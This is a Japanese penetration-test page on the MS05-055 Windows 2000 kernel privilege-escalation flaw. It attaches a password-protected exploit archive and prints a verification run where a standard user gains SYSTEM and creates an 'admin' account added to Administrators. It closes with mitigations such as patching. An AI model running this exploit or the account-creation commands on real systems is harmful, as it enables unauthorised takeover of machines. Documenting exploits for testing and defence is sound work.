目次
MS05-055:Windows カーネルの脆弱性により、特権が昇格される
更新履歴
- 2006/02/16 初版
- Author kikuzou
概要
- Windowsカーネルの脆弱性により、特権の昇格が可能
影響を受けるシステム
- Microsoft Windows 2000 Service Pack 4
影響を受けないシステム
- Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003 for Itanium-based Systems および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
- Microsoft Windows Server 2003 x64 Edition
- Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、および Microsoft Windows Millennium Edition (Me)
添付ファイル
| files | password |
|---|---|
| ms05-055.zip | pen-test |
参考URL
Exploitの検証
検証環境
- Windows2000 Server SP4 日本語版
検証結果
- 一般ユーザでログイン後、以下コマンドを実行する。
C:\>whoami
VM-W2KSRV\staff01
C:\>MS05-055.exe helper.exe
MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
Create by SoBeIt.
Child ESP:f27ccc0c
PoolIndex:cb PoolType:7c
~ 省略 ~
The sleep has awaken.
Target thread handle:3c0, Target process handle:3d8, Process id:1a4
helper.exe 960 420
Now waitting for triggering the bug.
Got thread handle:3c0, Got process id:1a4
Process handle:3d4
Now terminating process.
Parent process id:498
In child thread. Now terminating to trigger the bug.
Exploit finished.
C:\>whoami
NT AUTHORITY\SYSTEM
C:\temp>
C:\temp>net user admin admin /add
コマンドは正常に終了しました。
C:\temp>net localgroup administrators admin /add
コマンドは正常に終了しました。
C:\>
- 作成されたユーザの設定は下図のとおり。
対処方法
- MS05-055 パッチの適用 (Windows Update の実施)
- ユーザの厳格な管理
- 不要なユーザを作成しない
